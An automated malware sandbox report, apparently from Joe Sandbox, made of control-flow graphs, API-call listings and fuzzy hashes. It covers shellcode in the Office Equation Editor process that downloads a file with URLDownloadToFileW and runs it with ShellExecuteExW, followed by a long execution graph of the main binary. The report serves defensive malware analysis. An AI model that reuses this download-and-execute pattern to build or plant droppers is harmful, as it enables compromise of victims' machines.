                                                      control_flow_graph 176 35c03ef-35c04b7 call 35c0460 URLDownloadToFileW call 35c04aa call 35c04c1 195 35c051e-35c0522 176->195 196 35c04b9-35c04be 176->196 197 35c054d-35c0556 195->197 198 35c0524 195->198 199 35c0517 196->199 200 35c04c0-35c04d6 ShellExecuteExW call 35c04df 196->200 201 35c051a-35c051d 197->201 202 35c0528 198->202 199->201 200->202 214 35c04d8 200->214 204 35c051f-35c0522 201->204 205 35c0558 201->205 206 35c052a-35c052e 202->206 207 35c0530-35c0534 202->207 204->197 204->198 209 35c055b-35c055c 205->209 206->207 210 35c053c-35c0543 206->210 211 35c0549-35c054b 207->211 212 35c0536-35c053a 207->212 215 35c0545 210->215 216 35c0547 210->216 211->209 212->210 212->211 214->211 217 35c04da-35c04e4 ExitProcess 214->217 215->211 216->197
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.456215028.00000000035C0000.00000004.00000020.00020000.00000000.sdmp, Offset: 035C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_35c0000_EQNEDT32.jbxd
                                                      Similarity
                                                      • API ID: DownloadExecuteExitFileProcessShell
                                                      • String ID: <
                                                      • API String ID: 3584569557-4251816714
                                                      • Opcode ID: 1066b5303ae78e2ecfe213613da7084323be4ab0bd8179770c9edc9d3a08161b
                                                      • Instruction ID: 9b65da98696555316a8602819448d50f1e894368b01929f84f22cec11b5873f6
                                                      • Opcode Fuzzy Hash: 1066b5303ae78e2ecfe213613da7084323be4ab0bd8179770c9edc9d3a08161b
                                                      • Instruction Fuzzy Hash: AD3190A281D3C59FC712D7B05CAC696BFA07F92118F0E8ADED0864B0F3E668C405C716
                                                      Function 035C0460 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43filenetworkCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 220 35c0460-35c0493 URLDownloadToFileW 221 35c049a-35c04b7 call 35c04c1 220->221 222 35c0495 call 35c04aa 220->222 226 35c051e-35c0522 221->226 227 35c04b9-35c04be 221->227 222->221 228 35c054d-35c0556 226->228 229 35c0524 226->229 230 35c0517 227->230 231 35c04c0-35c04d6 ShellExecuteExW call 35c04df 227->231 232 35c051a-35c051d 228->232 233 35c0528 229->233 230->232 231->233 245 35c04d8 231->245 235 35c051f-35c0522 232->235 236 35c0558 232->236 237 35c052a-35c052e 233->237 238 35c0530-35c0534 233->238 235->228 235->229 240 35c055b-35c055c 236->240 237->238 241 35c053c-35c0543 237->241 242 35c0549-35c054b 238->242 243 35c0536-35c053a 238->243 246 35c0545 241->246 247 35c0547 241->247 242->240 243->241 243->242 245->242 248 35c04da-35c04e4 ExitProcess 245->248 246->242 247->228
                                                      APIs
                                                      • URLDownloadToFileW.URLMON(00000000,035C0400,?,00000000,00000000), ref: 035C0462
                                                        • Part of subcall function 035C04AA: ShellExecuteExW.SHELL32(0000003C), ref: 035C04CC
                                                        • Part of subcall function 035C04AA: ExitProcess.KERNEL32(00000000), ref: 035C04E4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.456215028.00000000035C0000.00000004.00000020.00020000.00000000.sdmp, Offset: 035C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_35c0000_EQNEDT32.jbxd
                                                      Similarity
                                                      • API ID: DownloadExecuteExitFileProcessShell
                                                      • String ID: <
                                                      • API String ID: 3584569557-4251816714
                                                      • Opcode ID: 41f9daba8561a70db53e067a2fb0e12596d7092a8b99f8b45ea691832e1404c1
                                                      • Instruction ID: 36bf40fdf5f47609066d2c1ea14302d2b6ce03370c2214554e00fe3b9c9500f2
                                                      • Opcode Fuzzy Hash: 41f9daba8561a70db53e067a2fb0e12596d7092a8b99f8b45ea691832e1404c1
                                                      • Instruction Fuzzy Hash: 4401F2A541D3C4DFD7A1E7F4E88879BBAE4BFC0218F11085D904A871F3E934C8058605
                                                      Function 035C04AA Relevance: 3.0, APIs: 2, Instructions: 48COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 251 35c04aa-35c04ac 253 35c04b1-35c04b7 251->253 254 35c04ac call 35c04c1 251->254 255 35c051e-35c0522 253->255 256 35c04b9-35c04be 253->256 254->253 257 35c054d-35c0556 255->257 258 35c0524 255->258 259 35c0517 256->259 260 35c04c0-35c04d6 ShellExecuteExW call 35c04df 256->260 261 35c051a-35c051d 257->261 262 35c0528 258->262 259->261 260->262 274 35c04d8 260->274 264 35c051f-35c0522 261->264 265 35c0558 261->265 266 35c052a-35c052e 262->266 267 35c0530-35c0534 262->267 264->257 264->258 269 35c055b-35c055c 265->269 266->267 270 35c053c-35c0543 266->270 271 35c0549-35c054b 267->271 272 35c0536-35c053a 267->272 275 35c0545 270->275 276 35c0547 270->276 271->269 272->270 272->271 274->271 277 35c04da-35c04e4 ExitProcess 274->277 275->271 276->257
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.456215028.00000000035C0000.00000004.00000020.00020000.00000000.sdmp, Offset: 035C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_35c0000_EQNEDT32.jbxd
                                                      Similarity
                                                      • API ID: ExecuteExitProcessShell
                                                      • String ID:
                                                      • API String ID: 1124553745-0
                                                      • Opcode ID: e449b059f35ec37d498585a96fd9926a6281ad73fbaca2b8919475d45b3c2b42
                                                      • Instruction ID: 8ffa7036b541ba28bc34d1b844c128e0b6a610da2a0890c7b433b35f048837c1
                                                      • Opcode Fuzzy Hash: e449b059f35ec37d498585a96fd9926a6281ad73fbaca2b8919475d45b3c2b42
                                                      • Instruction Fuzzy Hash: 8701F7D84353C6DFCAF0E6E8F4841EAAA90FA4160CBD8845EA495070F7D524C583861D
                                                      Function 035C04C1 Relevance: 3.0, APIs: 2, Instructions: 45COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 280 35c04c1-35c04cc ShellExecuteExW 282 35c04d3-35c04d6 280->282 283 35c04ce call 35c04df 280->283 285 35c0528 282->285 286 35c04d8 282->286 283->282 287 35c052a-35c052e 285->287 288 35c0530-35c0534 285->288 289 35c0549-35c054b 286->289 290 35c04da-35c04e4 ExitProcess 286->290 287->288 292 35c053c-35c0543 287->292 288->289 293 35c0536-35c053a 288->293 291 35c055b-35c055c 289->291 295 35c0545 292->295 296 35c0547 292->296 293->289 293->292 295->289 298 35c054d-35c0556 296->298 300 35c051f-35c0522 298->300 301 35c0558 298->301 300->298 302 35c0524 300->302 301->291 302->285
                                                      APIs
                                                      • ShellExecuteExW.SHELL32(0000003C), ref: 035C04CC
                                                        • Part of subcall function 035C04DF: ExitProcess.KERNEL32(00000000), ref: 035C04E4
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.456215028.00000000035C0000.00000004.00000020.00020000.00000000.sdmp, Offset: 035C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_35c0000_EQNEDT32.jbxd
                                                      Similarity
                                                      • API ID: ExecuteExitProcessShell
                                                      • String ID:
                                                      • API String ID: 1124553745-0
                                                      • Opcode ID: 3e3e05e3a10e0b329dbe111682049233d00d728cb39c331fd52637c740ff1eff
                                                      • Instruction ID: f13e0f2be141ec292d2e822703a3aaae24bda593379f2dc0f2e73994508a580d
                                                      • Opcode Fuzzy Hash: 3e3e05e3a10e0b329dbe111682049233d00d728cb39c331fd52637c740ff1eff
                                                      • Instruction Fuzzy Hash: C2F0A2C98342C2DFCAB0E6E8F4552EAA611FB41208F8C884E9885030F7D028C1C38619
                                                      Function 035C04DF Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 303 35c04df-35c04e4 ExitProcess
                                                      APIs
                                                      • ExitProcess.KERNEL32(00000000), ref: 035C04E4
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.456215028.00000000035C0000.00000004.00000020.00020000.00000000.sdmp, Offset: 035C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_35c0000_EQNEDT32.jbxd
                                                      Similarity
                                                      • API ID: ExitProcess
                                                      • String ID:
                                                      • API String ID: 621844428-0
                                                      • Opcode ID: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
                                                      • Instruction ID: f49c04242a7a61e974833cf8218924656bc711991e28e6f13ed51e74029fe7d2
                                                      • Opcode Fuzzy Hash: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
                                                      • Instruction Fuzzy Hash:
                                                      Function 035C04E6 Relevance: .0, Instructions: 14COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 305 35c04e6-35c04f1 GetPEB 306 35c04f4-35c0505 call 35c050e 305->306 309 35c0507-35c050b 306->309
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.456215028.00000000035C0000.00000004.00000020.00020000.00000000.sdmp, Offset: 035C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_35c0000_EQNEDT32.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
                                                      • Instruction ID: a31a16de6f75b3ace4cf84b8c35201c11f12358ba0c77cc5ee85fa2957a35c36
                                                      • Opcode Fuzzy Hash: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
                                                      • Instruction Fuzzy Hash: 9AD05275222582CFC304DF08D980E57F37AFFC8624B28C2A8E0004B66AD730EC92CA94

                                                      Non-executed Functions

                                                      Function 035C0332 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 310 35c0332-35c0361 ExitProcess call 35c034b 315 35c03c9-35c03d3 310->315 316 35c0364 310->316 317 35c03d9-35c03e1 316->317 318 35c0366-35c037e 316->318 321 35c0451-35c04b7 URLDownloadToFileW call 35c04aa call 35c04c1 317->321 322 35c03e3-35c03f6 317->322 327 35c03ef-35c03f6 318->327 328 35c0380-35c0384 318->328 342 35c051e-35c0522 321->342 343 35c04b9-35c04be 321->343 325 35c03fa-35c044f call 35c0460 322->325 325->321 327->325 328->317 331 35c0386 328->331 331->325 334 35c0388-35c03c6 call 35c03c0 331->334 334->315 346 35c054d-35c0556 342->346 347 35c0524 342->347 348 35c0517 343->348 349 35c04c0-35c04d6 ShellExecuteExW call 35c04df 343->349 352 35c051a-35c051d 346->352 353 35c0528 347->353 348->352 349->353 369 35c04d8 349->369 357 35c051f-35c0522 352->357 358 35c0558 352->358 359 35c052a-35c052e 353->359 360 35c0530-35c0534 353->360 357->346 357->347 364 35c055b-35c055c 358->364 359->360 365 35c053c-35c0543 359->365 366 35c0549-35c054b 360->366 367 35c0536-35c053a 360->367 370 35c0545 365->370 371 35c0547 365->371 366->364 367->365 367->366 369->366 372 35c04da-35c04e4 ExitProcess 369->372 370->366 371->346
                                                      APIs
                                                      • ExitProcess.KERNEL32(035C0320), ref: 035C0332
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.456215028.00000000035C0000.00000004.00000020.00020000.00000000.sdmp, Offset: 035C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_35c0000_EQNEDT32.jbxd
                                                      Similarity
                                                      • API ID: ExitProcess
                                                      • String ID:
                                                      • API String ID: 621844428-0
                                                      • Opcode ID: d5d9092efee72c7dede64c69652709bd6a2087090d3ab9cdc19f5b80716a85da
                                                      • Instruction ID: 778c39b3255860dc9ae7c137f3789a68a93846cf9cf2b787d4e3b911c7fc34f9
                                                      • Opcode Fuzzy Hash: d5d9092efee72c7dede64c69652709bd6a2087090d3ab9cdc19f5b80716a85da
                                                      • Instruction Fuzzy Hash: 0211815582E7C09FC712D7B02E69049BF60BA53818B5C86DFD0968B0F3D258D606D352

                                                      Execution Graph

                                                      Execution Coverage:3.6%
                                                      Dynamic/Decrypted Code Coverage:0.4%
                                                      Signature Coverage:8.1%
                                                      Total number of Nodes:2000
                                                      Total number of Limit Nodes:173
                                                      execution_graph 104066 803633 104067 80366a 104066->104067 104068 8036e7 104067->104068 104069 803688 104067->104069 104110 8036e5 104067->104110 104071 8036ed 104068->104071 104072 83d0cc 104068->104072 104073 803695 104069->104073 104074 80374b PostQuitMessage 104069->104074 104070 8036ca NtdllDefWindowProc_W 104075 8036d8 104070->104075 104076 8036f2 104071->104076 104077 803715 SetTimer RegisterClipboardFormatW 104071->104077 104115 811070 10 API calls Mailbox 104072->104115 104079 8036a0 104073->104079 104080 83d154 104073->104080 104074->104075 104081 8036f9 KillTimer 104076->104081 104082 83d06f 104076->104082 104077->104075 104084 80373e CreatePopupMenu 104077->104084 104085 803755 104079->104085 104086 8036a8 104079->104086 104131 862527 72 API calls _memset 104080->104131 104111 80443a Shell_NotifyIconW _memset 104081->104111 104088 83d074 104082->104088 104089 83d0a8 MoveWindow 104082->104089 104083 83d0f3 104116 811093 342 API calls Mailbox 104083->104116 104084->104075 104113 8044a0 65 API calls _memset 104085->104113 104092 8036b3 104086->104092 104093 83d139 104086->104093 104097 83d097 SetFocus 104088->104097 104098 83d078 104088->104098 104089->104075 104100 8036be 104092->104100 104101 83d124 104092->104101 104093->104070 104130 857c36 60 API calls Mailbox 104093->104130 104094 83d166 104094->104070 104094->104075 104096 803764 104096->104075 104097->104075 104098->104100 104102 83d081 104098->104102 104099 80370c 104112 803114 DeleteObject DestroyWindow Mailbox 104099->104112 104100->104070 104117 80443a Shell_NotifyIconW _memset 104100->104117 104129 862d36 82 API calls _memset 104101->104129 104114 811070 10 API calls Mailbox 104102->104114 104108 83d118 104118 80434a 104108->104118 104110->104070 104111->104099 104112->104075 104113->104096 104114->104075 104115->104083 104116->104100 104117->104108 104119 804375 _memset 104118->104119 104132 804182 104119->104132 104122 8043fa 104124 804430 Shell_NotifyIconW 104122->104124 104125 804414 Shell_NotifyIconW 104122->104125 104126 804422 104124->104126 104125->104126 104136 80407c 104126->104136 104128 804429 104128->104110 104129->104096 104130->104110 104131->104094 104133 83d423 104132->104133 104134 804196 104132->104134 104133->104134 104135 83d42c DestroyCursor 104133->104135 104134->104122 104158 862f94 63 API calls _W_store_winword 104134->104158 104135->104134 104137 804098 104136->104137 104157 80416f Mailbox 104136->104157 104159 807a16 104137->104159 104140 8040b3 104164 807bcc 104140->104164 104141 83d3c8 LoadStringW 104144 83d3e2 104141->104144 104143 8040c8 104143->104144 104145 8040d9 104143->104145 104146 807b2e 60 API calls 104144->104146 104147 8040e3 104145->104147 104148 804174 104145->104148 104151 83d3ec 104146->104151 104173 807b2e 104147->104173 104182 808047 104148->104182 104154 8040ed _memset _wcscpy 104151->104154 104186 807cab 104151->104186 104153 83d40e 104156 807cab 60 API calls 104153->104156 104155 804155 Shell_NotifyIconW 104154->104155 104155->104157 104156->104154 104157->104128 104158->104122 104193 820db6 104159->104193 104161 807a3b 104203 808029 104161->104203 104165 807c45 104164->104165 104166 807bd8 __NMSG_WRITE 104164->104166 104235 807d2c 104165->104235 104168 807c13 104166->104168 104169 807bee 104166->104169 104171 808029 60 API calls 104168->104171 104234 807f27 60 API calls Mailbox 104169->104234 104172 807bf6 _memmove 104171->104172 104172->104143 104174 807b40 104173->104174 104175 83ec6b 104173->104175 104243 807a51 104174->104243 104249 857bdb 60 API calls _memmove 104175->104249 104178 83ec75 104180 808047 60 API calls 104178->104180 104179 807b4c 104179->104154 104181 83ec7d Mailbox 104180->104181 104183 808052 104182->104183 104184 80805a 104182->104184 104250 807f77 60 API calls 2 library calls 104183->104250 104184->104154 104187 83ed4a 104186->104187 104188 807cbf 104186->104188 104190 808029 60 API calls 104187->104190 104251 807c50 104188->104251 104192 83ed55 __NMSG_WRITE _memmove 104190->104192 104191 807cca 104191->104153 104196 820dbe 104193->104196 104195 820dd8 104195->104161 104196->104195 104198 820ddc std::exception::exception 104196->104198 104206 82571c 104196->104206 104223 8233a1 RtlDecodePointer 104196->104223 104224 82859b RaiseException 104198->104224 104200 820e06 104225 8284d1 59 API calls _free 104200->104225 104202 820e18 104202->104161 104204 820db6 Mailbox 60 API calls 104203->104204 104205 8040a6 104204->104205 104205->104140 104205->104141 104207 825797 104206->104207 104212 825728 104206->104212 104232 8233a1 RtlDecodePointer 104207->104232 104209 825733 104209->104212 104226 82a16b 59 API calls __NMSG_WRITE 104209->104226 104227 82a1c8 59 API calls 6 library calls 104209->104227 104228 82309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 104209->104228 104210 82579d 104233 828b28 59 API calls __getptd_noexit 104210->104233 104212->104209 104215 82575b RtlAllocateHeap 104212->104215 104217 825783 104212->104217 104221 825781 104212->104221 104229 8233a1 RtlDecodePointer 104212->104229 104214 82578f 104214->104196 104215->104212 104215->104214 104230 828b28 59 API calls __getptd_noexit 104217->104230 104231 828b28 59 API calls __getptd_noexit 104221->104231 104223->104196 104224->104200 104225->104202 104226->104209 104227->104209 104229->104212 104230->104221 104231->104214 104232->104210 104233->104214 104234->104172 104236 807d43 _memmove 104235->104236 104237 807d3a 104235->104237 104236->104172 104237->104236 104239 807e4f 104237->104239 104240 807e62 104239->104240 104242 807e5f _memmove 104239->104242 104241 820db6 Mailbox 60 API calls 104240->104241 104241->104242 104242->104236 104244 807a5f 104243->104244 104245 807a85 _memmove 104243->104245 104244->104245 104246 820db6 Mailbox 60 API calls 104244->104246 104245->104179 104247 807ad4 104246->104247 104248 820db6 Mailbox 60 API calls 104247->104248 104248->104245 104249->104178 104250->104184 104252 807c5f __NMSG_WRITE 104251->104252 104253 808029 60 API calls 104252->104253 104254 807c70 _memmove 104252->104254 104255 83ed07 _memmove 104253->104255 104254->104191 104256 94da30 104257 94da40 104256->104257 104258 94db5a LoadLibraryA 104257->104258 104262 94db9f VirtualProtect VirtualProtect 104257->104262 104259 94db71 104258->104259 104259->104257 104261 94db83 GetProcAddress 104259->104261 104261->104259 104264 94db99 ExitProcess 104261->104264 104263 94dc04 104262->104263 104263->104263 104265 827c56 104266 827c62 _fprintf 104265->104266 104302 829e08 GetStartupInfoW 104266->104302 104268 827c67 104304 828b7c GetProcessHeap 104268->104304 104270 827cbf 104271 827cca 104270->104271 104387 827da6 59 API calls 3 library calls 104270->104387 104305 829ae6 104271->104305 104274 827cd0 104275 827cdb __RTC_Initialize 104274->104275 104388 827da6 59 API calls 3 library calls 104274->104388 104326 82d5d2 104275->104326 104278 827cea 104279 827cf6 GetCommandLineW 104278->104279 104389 827da6 59 API calls 3 library calls 104278->104389 104345 834f23 GetEnvironmentStringsW 104279->104345 104283 827cf5 104283->104279 104285 827d10 104286 827d1b 104285->104286 104390 8230b5 59 API calls 3 library calls 104285->104390 104355 834d58 104286->104355 104289 827d21 104290 827d2c 104289->104290 104391 8230b5 59 API calls 3 library calls 104289->104391 104369 8230ef 104290->104369 104293 827d34 104294 827d3f __wwincmdln 104293->104294 104392 8230b5 59 API calls 3 library calls 104293->104392 104375 8047d0 104294->104375 104297 827d53 104298 827d62 104297->104298 104393 823358 59 API calls _doexit 104297->104393 104394 8230e0 59 API calls _doexit 104298->104394 104301 827d67 _fprintf 104303 829e1e 104302->104303 104303->104268 104304->104270 104395 823187 RtlEncodePointer 104305->104395 104307 829aeb 104401 829d3c 104307->104401 104310 829af4 104405 829b5c 62 API calls 2 library calls 104310->104405 104313 829af9 104313->104274 104314 829b06 104314->104310 104315 829b11 104314->104315 104407 8287d5 104315->104407 104317 829b53 104415 829b5c 62 API calls 2 library calls 104317->104415 104318 829b1e 104318->104317 104413 829de6 TlsSetValue 104318->104413 104321 829b58 104321->104274 104322 829b32 104322->104317 104323 829b38 104322->104323 104414 829a33 59 API calls 4 library calls 104323->104414 104325 829b40 GetCurrentThreadId 104325->104274 104327 82d5de _fprintf 104326->104327 104432 829c0b 104327->104432 104329 82d5e5 104330 8287d5 __calloc_crt 59 API calls 104329->104330 104331 82d5f6 104330->104331 104332 82d661 GetStartupInfoW 104331->104332 104333 82d601 @_EH4_CallFilterFunc@8 _fprintf 104331->104333 104334 82d7a5 104332->104334 104341 82d676 104332->104341 104333->104278 104335 82d86d 104334->104335 104339 82d7f2 GetStdHandle 104334->104339 104340 82d805 GetFileType 104334->104340 104344 829e2b __ioinit 2 API calls 104334->104344 104439 82d87d RtlLeaveCriticalSection _doexit 104335->104439 104337 82d6c4 104337->104334 104342 82d6f8 GetFileType 104337->104342 104343 829e2b __ioinit 2 API calls 104337->104343 104338 8287d5 __calloc_crt 59 API calls 104338->104341 104339->104334 104340->104334 104341->104334 104341->104337 104341->104338 104342->104337 104343->104337 104344->104334 104346 834f34 104345->104346 104347 827d06 104345->104347 104478 82881d 59 API calls 2 library calls 104346->104478 104351 834b1b GetModuleFileNameW 104347->104351 104349 834f5a _memmove 104350 834f70 FreeEnvironmentStringsW 104349->104350 104350->104347 104352 834b4f _wparse_cmdline 104351->104352 104354 834b8f _wparse_cmdline 104352->104354 104479 82881d 59 API calls 2 library calls 104352->104479 104354->104285 104356 834d71 __NMSG_WRITE 104355->104356 104360 834d69 104355->104360 104357 8287d5 __calloc_crt 59 API calls 104356->104357 104358 834d9a __NMSG_WRITE 104357->104358 104358->104360 104361 8287d5 __calloc_crt 59 API calls 104358->104361 104362 834df1 104358->104362 104363 834e16 104358->104363 104366 834e2d 104358->104366 104480 834607 59 API calls 2 library calls 104358->104480 104359 822d55 _free 59 API calls 104359->104360 104360->104289 104361->104358 104362->104359 104365 822d55 _free 59 API calls 104363->104365 104365->104360 104481 828dc6 IsProcessorFeaturePresent 104366->104481 104368 834e39 104368->104289 104370 8230fb __IsNonwritableInCurrentImage 104369->104370 104504 82a4d1 104370->104504 104372 823119 __initterm_e 104374 823138 _doexit __IsNonwritableInCurrentImage 104372->104374 104507 822d40 104372->104507 104374->104293 104376 8047ea 104375->104376 104386 804889 104375->104386 104377 804824 73666F36 104376->104377 104542 82336c 104377->104542 104381 804850 104554 8048fd SystemParametersInfoW SystemParametersInfoW 104381->104554 104383 80485c 104555 803b3a 104383->104555 104385 804864 SystemParametersInfoW 104385->104386 104386->104297 104387->104271 104388->104275 104389->104283 104393->104298 104394->104301 104416 8233c7 104395->104416 104397 823198 __init_pointers __initp_misc_winsig 104417 82a524 RtlEncodePointer 104397->104417 104399 8231b0 __init_pointers 104400 829e99 34 API calls 104399->104400 104400->104307 104402 829d48 104401->104402 104404 829af0 104402->104404 104418 829e2b 104402->104418 104404->104310 104406 829d8a TlsAlloc 104404->104406 104405->104313 104406->104314 104408 8287dc 104407->104408 104410 828817 104408->104410 104412 8287fa 104408->104412 104421 8351f6 104408->104421 104410->104318 104412->104408 104412->104410 104429 82a132 Sleep 104412->104429 104413->104322 104414->104325 104415->104321 104416->104397 104417->104399 104419 829e3b InitializeCriticalSectionEx 104418->104419 104420 829e48 InitializeCriticalSectionAndSpinCount 104418->104420 104419->104402 104420->104402 104422 835201 104421->104422 104427 83521c 104421->104427 104423 83520d 104422->104423 104422->104427 104430 828b28 59 API calls __getptd_noexit 104423->104430 104424 83522c RtlAllocateHeap 104424->104427 104428 835212 104424->104428 104427->104424 104427->104428 104431 8233a1 RtlDecodePointer 104427->104431 104428->104408 104429->104412 104430->104428 104431->104427 104433 829c2f RtlEnterCriticalSection 104432->104433 104434 829c1c 104432->104434 104433->104329 104440 829c93 104434->104440 104436 829c22 104436->104433 104464 8230b5 59 API calls 3 library calls 104436->104464 104439->104333 104441 829c9f _fprintf 104440->104441 104442 829cc0 104441->104442 104443 829ca8 104441->104443 104452 829ce1 _fprintf 104442->104452 104468 82881d 59 API calls 2 library calls 104442->104468 104465 82a16b 59 API calls __NMSG_WRITE 104443->104465 104445 829cad 104466 82a1c8 59 API calls 6 library calls 104445->104466 104448 829cd5 104450 829ceb 104448->104450 104451 829cdc 104448->104451 104449 829cb4 104467 82309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 104449->104467 104453 829c0b __lock 59 API calls 104450->104453 104469 828b28 59 API calls __getptd_noexit 104451->104469 104452->104436 104456 829cf2 104453->104456 104458 829d17 104456->104458 104459 829cff 104456->104459 104470 822d55 104458->104470 104460 829e2b __ioinit 2 API calls 104459->104460 104462 829d0b 104460->104462 104476 829d33 RtlLeaveCriticalSection _doexit 104462->104476 104465->104445 104466->104449 104468->104448 104469->104452 104471 822d87 _free 104470->104471 104472 822d5e HeapFree 104470->104472 104471->104462 104472->104471 104473 822d73 104472->104473 104477 828b28 59 API calls __getptd_noexit 104473->104477 104475 822d79 GetLastError 104475->104471 104476->104452 104477->104475 104478->104349 104479->104354 104480->104358 104482 828dd1 104481->104482 104487 828c59 104482->104487 104486 828dec 104486->104368 104488 828c73 _memset ___raise_securityfailure 104487->104488 104489 828c93 IsDebuggerPresent 104488->104489 104495 82a155 SetUnhandledExceptionFilter UnhandledExceptionFilter 104489->104495 104492 828d7a 104494 82a140 GetCurrentProcess TerminateProcess 104492->104494 104493 828d57 ___raise_securityfailure 104496 82c5f6 104493->104496 104494->104486 104495->104493 104497 82c600 IsProcessorFeaturePresent 104496->104497 104498 82c5fe 104496->104498 104500 83590a 104497->104500 104498->104492 104503 8358b9 5 API calls ___raise_securityfailure 104500->104503 104502 8359ed 104502->104492 104503->104502 104505 82a4d4 RtlEncodePointer 104504->104505 104505->104505 104506 82a4ee 104505->104506 104506->104372 104510 822c44 104507->104510 104509 822d4b 104509->104374 104511 822c50 _fprintf 104510->104511 104518 823217 104511->104518 104517 822c77 _fprintf 104517->104509 104519 829c0b __lock 59 API calls 104518->104519 104520 822c59 104519->104520 104521 822c88 RtlDecodePointer RtlDecodePointer 104520->104521 104522 822c65 104521->104522 104523 822cb5 104521->104523 104532 822c82 104522->104532 104523->104522 104535 8287a4 60 API calls 2 library calls 104523->104535 104525 822d18 RtlEncodePointer RtlEncodePointer 104525->104522 104526 822cec 104526->104522 104531 822d06 RtlEncodePointer 104526->104531 104537 828864 62 API calls 2 library calls 104526->104537 104527 822cc7 104527->104525 104527->104526 104536 828864 62 API calls 2 library calls 104527->104536 104530 822d00 104530->104522 104530->104531 104531->104525 104538 823220 104532->104538 104535->104527 104536->104526 104537->104530 104541 829d75 RtlLeaveCriticalSection 104538->104541 104540 822c87 104540->104517 104541->104540 104543 829c0b __lock 59 API calls 104542->104543 104544 823377 RtlDecodePointer RtlEncodePointer 104543->104544 104607 829d75 RtlLeaveCriticalSection 104544->104607 104546 804849 104547 8233d4 104546->104547 104548 8233f8 104547->104548 104549 8233de 104547->104549 104548->104381 104549->104548 104608 828b28 59 API calls __getptd_noexit 104549->104608 104551 8233e8 104609 828db6 9 API calls _fprintf 104551->104609 104553 8233f3 104553->104381 104554->104383 104556 803b47 __ftell_nolock 104555->104556 104610 807667 104556->104610 104560 803b7a IsDebuggerPresent 104561 83d272 MessageBoxA 104560->104561 104562 803b88 104560->104562 104564 83d28c 104561->104564 104562->104564 104565 803ba5 104562->104565 104594 803c61 104562->104594 104563 803c68 SetCurrentDirectoryW 104566 803c75 Mailbox 104563->104566 104814 807213 60 API calls Mailbox 104564->104814 104696 807285 104565->104696 104566->104385 104569 83d29c 104574 83d2b2 SetCurrentDirectoryW 104569->104574 104571 803bc3 GetFullPathNameW 104572 807bcc 60 API calls 104571->104572 104573 803bfe 104572->104573 104712 81092d 104573->104712 104574->104566 104577 803c1c 104578 803c26 104577->104578 104815 85874b AllocateAndInitializeSid CheckTokenMembership FreeSid 104577->104815 104728 803a46 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 104578->104728 104581 83d2cf 104581->104578 104584 83d2e0 104581->104584 104816 804706 104584->104816 104594->104563 104607->104546 104608->104551 104609->104553 104611 820db6 Mailbox 60 API calls 104610->104611 104612 807688 104611->104612 104613 820db6 Mailbox 60 API calls 104612->104613 104614 803b51 GetCurrentDirectoryW 104613->104614 104615 803766 104614->104615 104616 807667 60 API calls 104615->104616 104617 80377c 104616->104617 104827 803d31 104617->104827 104619 80379a 104620 804706 62 API calls 104619->104620 104621 8037ae 104620->104621 104622 807de1 60 API calls 104621->104622 104623 8037bb 104622->104623 104841 804ddd 104623->104841 104626 83d173 104908 86955b 104626->104908 104627 8037dc Mailbox 104630 808047 60 API calls 104627->104630 104633 8037ef 104630->104633 104632 822d55 _free 59 API calls 104635 83d19f 104632->104635 104865 80928a 104633->104865 104634 83d192 104634->104632 104637 804e4a 85 API calls 104635->104637 104639 83d1a8 104637->104639 104643 803ed0 60 API calls 104639->104643 104640 807de1 60 API calls 104641 803808 104640->104641 104868 8084c0 104641->104868 104645 83d1c3 104643->104645 104644 80381a Mailbox 104646 807de1 60 API calls 104644->104646 104647 803ed0 60 API calls 104645->104647 104648 803840 104646->104648 104649 83d1df 104647->104649 104650 8084c0 70 API calls 104648->104650 104651 804706 62 API calls 104649->104651 104653 80384f Mailbox 104650->104653 104652 83d204 104651->104652 104654 803ed0 60 API calls 104652->104654 104656 807667 60 API calls 104653->104656 104655 83d210 104654->104655 104657 808047 60 API calls 104655->104657 104658 80386d 104656->104658 104659 83d21e 104657->104659 104872 803ed0 104658->104872 104661 803ed0 60 API calls 104659->104661 104663 83d22d 104661->104663 104669 808047 60 API calls 104663->104669 104665 803887 104665->104639 104666 803891 104665->104666 104667 822efd 